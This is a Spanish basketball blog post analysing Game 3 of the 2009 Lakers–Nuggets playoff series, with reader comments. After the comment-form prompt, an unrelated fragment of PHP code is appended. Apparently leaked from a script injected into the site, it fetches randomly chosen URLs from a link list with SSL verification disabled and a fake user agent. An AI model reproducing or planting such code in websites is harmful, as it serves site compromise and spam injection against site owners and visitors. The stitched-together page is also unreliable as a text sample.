Playoffs 23/05/2009: Golpe de efecto en Colorado

24 de May de 2009 por TheDeerHunter

Otro partido más de seminales capaz de engordar la cuenta de muchos cardiólogos. Éste no se resolvió con un buzzer beater en el último segundo sino cerca de medio minuto antes, cuando Ariza volvió a sacar petróleo de un ridículo saque de banda regurgitado por “Bruto” Martin en dirección a Melo, terminando con la expulsión de éste con cara de tonto incluida y una desventaja de 4 puntos que iba a resultar definitiva. Rubricando así actuación que ambos jugadores de Denver desearían olvidar.
Es del todo sorprendente que anoche se les escapara el partido a los Nuggets. Durante 40 minutos fueron significativamente mejores, con un Carmelo Anthony martilleando con 18 puntos sólo en la primera parte, un Nené causando estragos y Chris Andersen haciendo el partido de su vida. Por parte de Lakers, el a priori acierto de Jackson poniendo a Kobe sobre Billups no obtenía grandes réditos defensivos y, sin un plan claro en ataque, con unos Bynum, Fisher, Farmar o Vujacic en estado catatónico bastante hacían con aguantar el tipo aunque más por desaciertos puntuales ajenos que por méritos propios. Durante la primera parte lo mejor que se puede decir de ellos es que tuvieron suerte de sobrevivir al chaparrón y también de que Billups y JR Smith no tuvieran su día.
Llegada la segunda parte, la ansiedad de Denver fue creciendo ante el aguante angelino y la excitación les llevó a salirse del patrón, con acciones que rozaban lo violento con intención de presionar hasta el límite a rivales y árbitros. Mérito de Lakers de llevar esa sobreexcitación a su terreno, a la hora de provocar faltas y tiros libres que, sin llegar a estar especialmente acertados provocaron en Nené, Melo y Martin problemas de acumulación de faltas. Con todo, un arreón de JR Smith elevó la ventaja de Denver a 8 puntos antes de comenzar el último cuarto.
Posiblemente fueron las tortas las que espabilaron a los Lakers y, de uno de los golpes recibidos Ariza salió aparentemente lesionado. Ahí L.A. mejoró en defensa por mucho que Walton, Vujacic, Farmar o Fisher seguían siendo un coladero. En un impasse con Kobe descansando Denver se atasco más de la cuenta y los Lakers se dieron cuenta de que podían llevarse el partido. En eso volvió Ariza a la pista, con apenas 2/4 puntos de desventaja.
Ahí los Lakers mostraron su mejor cara, con Gasol y Kobe decisivos y forzando muchas faltas. Ariza importantísimo anotando canastas importantes y secando a Melo durante todo el periodo. Cada instante que pasaba les resultaba más difícil anotar a Denver y en una de esas, con el choque en el filo de la navaja, sucedió la cagada de K. Martin y Carmelo. Con esto se sentenciaron.
Es difícil explicar cómo puede ser que un equipo juegue mucho mejor que otro durante tres partidos y sin embargo van perdiendo la serie 2 a 1. Por las caras de Melo, George Karl, Martin o Billups les costará asimilarlo. Si los Lakers logran encauzar la ansiedad de sus rivales como ya hecho hoy tienen la victoria medio asegurada. Es previsible que esto se alargue.

MVP: Kobe no tomó las mejores decisiones en cuanto a lectura de juego, pero ganó el partido a base de talento en bruto. Supo sacar muchos tiros libres y anotó lanzamientos increíbles, especialmente en el último cuarto. Se fue hasta los 41 puntos 6 rebotes y 5 asistencias con excelentes porcentajes, pero para la salud de los aficionados angelinos sería conveniente que lo hiciera de otro modo.

La Sorpresa: No sé si decir que fue Ariza o el hecho de que un equipo como Denver no sabe hacer saques de banda.

La Decepción: JR Smith, como dicen algunos, está de psicólogo. Anoche tuvo algún buen momento, sobre todo ante la defensa de unas marías como Fisher o Vujacic… pero es que está que no le da a una vaca con un melón a dos metros. 4-15 y porque tuvo suerte de anotar algún tiro forzadísimo.

El mayor esfuerzo en vano: Chris Andersen hizo el partido de su vida a base de coraje y esfuerzo… y que la defensa angelina pasa a cuatro manos de cerrar el rebote.

Comenta

5 comentarios a esta entrada

  1. ÑBA dice:
    #1

    Como jugó Anderser… y JR parecía que despertaba pero al final zas!
    Chauncey me sorprendió negativamente, lanzó varios tiros precipitados que cuando los vea en diferido no se reconocerá…

    Kobe estuvo capitán general en el último cuarto, ¡espectacular!

    Por momentos me recordó a Michael Jordan manejando a sus Bulls… el triple que mete a falta de minuto y medio sin palabras, igual o mejor que el de Lebron.

      Citar

  2. Viva_Dirk dice:
    #2

    Yo no creo que Denver halla jugado mucho mejor que Lakers, desde luego si creo que estan jugando mas cerca del 100% de su potencial que L.A.

    Anoche Gasol estuvo bastante mas implicado en el juego desde el principio, a mediados del tercer cuarto llevaba solo 7 tiros lanzados pero el balón habia pasado bastante por sus manos.

      Citar

  3. MagicJohnson32 dice:
    #3

    Vaya series, cada partido es de infarto.

    Los Lakers siguen jugando con 3, y el partido de ayer lo ganan esos 3. Lo gana Pau, subiendo un par de puntos el pistón en defensa y asumiendo responsabilidades en ataque al final como no había hecho hasta ahora. Eso, además, permitió a Kobe tomar un poco de oxígeno cuando estaba absolutamente fundido de cara al tramo final, cuando se sacó de la manga tres canastones, especialmente ese triple que ya hemos visto otras veces pero que sigue siendo increíble. Y luego está Ariza. El Terce Hombre, sin duda, y a veces el segundo e incluso el primero. Es el único que aprovecha los espacios que ganan Kobe y Pau, está anotando triples decisivos y robando balones que ganan partidos. El resto, en general, están para los leones (aunque me gustó mucho la defensa de Walton sobre Melo).

    Ojo, que los Nuggets tienen lo suyo. Andersen fue el mejor, y Karl lo sentó no sé muy bien por qué razón. Melo desapareció en la segunda mitad, Billups cometió errores impropios, JR sigue perdido salvo en un par de fogonazos y Nene & Kenyon siguen sin evitar los problemas de faltas.

      Citar

  4. TheDeerHunter dice:
    #4

    y ¿porqué ya no juega Shannon Brown?? Mejor que Fisher y Farmar, con poco, se consigue… además, no estoy seguro que no le fuera bien defender a Billups (aunque Kobe lo hizo bastante bien… con algún error que otro bastante impropios)

    No sé, está más fallón que en las anteriores series… pero me encantó el corte que hizo en su única canasta del partido.

      Citar

  5. MagicJohnson32 dice:
    #5

    Sí, yo daría más minutos a Brown. Pese a la inexperiencia no se le ve nervioso y precipitado como Farmar. Y Fisher está de pena. Lástima, porque los problemas que tuvo con Aaron Brooks parece que le han quitado toda la confianza y nos hace falta para los minutos decisivos.

    La verdad es que la mejora de Ariza en el tiro de 3 nos está salvando el culo, porque apenas enchufan él y Kobe.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>